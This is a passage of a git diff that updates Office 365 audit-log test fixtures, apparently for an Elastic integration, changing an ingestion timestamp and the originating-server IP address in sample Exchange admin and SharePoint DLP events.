"{\"CreationTime\":\"2020-02-26T12:39:40\",\"Id\":\"93585ace-96eb-4af1-fdb2-08d7bab8f2bd\",\"IncidentId\":\"0ae82be2-e321-ab52-d000-08d7bab8fe55\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateAlert:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"NotifyUser\",\"GenerateAlert\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":2,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Document.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx\",\"FileSize\":35920,\"From\":\"alice@testsiem2.onmicrosoft.com\",\"IsViewableByExternalUsers\":false,\"ItemCreationTime\":\"2020-02-26T09:55:38\",\"ItemLastModifiedTime\":\"2020-02-26T09:56:12\",\"SiteCollectionGuid\":\"4aaa3319-df17-4ea0-a142-42cf204cfc62\",\"SiteCollectionUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications\",\"UniqueID\":\"3ace820e-9358-4520-9df6-5bd65602cef0\"},\"UserId\":\"DLPAgent\",\"UserKey\":\"DLPAgent\",\"UserType\":4,\"Version\":1,\"Workload\":\"SharePoint\"}", "code": "ComplianceDLPSharePoint", "provider": "SharePoint", @@ -764,7 +764,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.934383Z", + "ingested": "2021-12-09T13:42:29.971792700Z", "original": "{\"CreationTime\":\"2020-02-26T12:39:40\",\"Id\":\"93585ace-96eb-4af1-fdb2-08d7bab8f2bd\",\"IncidentId\":\"0ae82be2-e321-ab52-d000-08d7bab8fe55\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateAlert:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"NotifyUser\",\"GenerateAlert\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":2,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Document.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx\",\"FileSize\":35920,\"From\":\"alice@testsiem2.onmicrosoft.com\",\"IsViewableByExternalUsers\":false,\"ItemCreationTime\":\"2020-02-26T09:55:38\",\"ItemLastModifiedTime\":\"2020-02-26T09:56:12\",\"SiteCollectionGuid\":\"4aaa3319-df17-4ea0-a142-42cf204cfc62\",\"SiteCollectionUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications\",\"UniqueID\":\"3ace820e-9358-4520-9df6-5bd65602cef0\"},\"UserId\":\"DLPAgent\",\"UserKey\":\"DLPAgent\",\"UserType\":4,\"Version\":1,\"Workload\":\"SharePoint\"}", "code": "ComplianceDLPSharePoint", "provider": "SharePoint", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json index 0c402fadb96..66a77fd7ffa 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json @@ -2,7 +2,7 @@ "events": [ { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -14,7 +14,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -36,7 +36,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6c3454e1-1a13-411b-bed1-08d7adfc0c09\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6c3454e1-1a13-411b-bed1-08d7adfc0c09\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -48,7 +48,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -122,7 +122,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"b5131b23-3efb-481a-c05b-08d7ac0f2a82\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"b5131b23-3efb-481a-c05b-08d7ac0f2a82\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -134,7 +134,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -208,7 +208,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"ef597809-1c52-4a85-7cce-08d7adfc0939\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\2c6709f0-beaf-4ffd-99ea-d02c796c25d3\",\"Operation\":\"Install-DefaultSharingPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"ef597809-1c52-4a85-7cce-08d7adfc0939\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\2c6709f0-beaf-4ffd-99ea-d02c796c25d3\",\"Operation\":\"Install-DefaultSharingPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -220,7 +220,7 @@ "Operation": "Install-DefaultSharingPolicy", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -242,7 +242,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"362ff802-6df6-47e5-09a2-08d7adfc095b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Install-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:09\",\"ExternalAccess\":true,\"Id\":\"362ff802-6df6-47e5-09a2-08d7adfc095b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Install-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -254,7 +254,7 @@ "Operation": "Install-AdminAuditLogConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -276,7 +276,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -288,7 +288,7 @@ "Operation": "Set-TransportConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -314,7 +314,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:43\",\"ExternalAccess\":true,\"Id\":\"168019d2-1e8a-4394-e90b-08d7ac0f1e69\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\"},{\"Name\":\"UMDataStorage\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:43\",\"ExternalAccess\":true,\"Id\":\"168019d2-1e8a-4394-e90b-08d7ac0f1e69\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}\"},{\"Name\":\"UMDataStorage\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -326,7 +326,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "Arbitration", @@ -356,7 +356,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 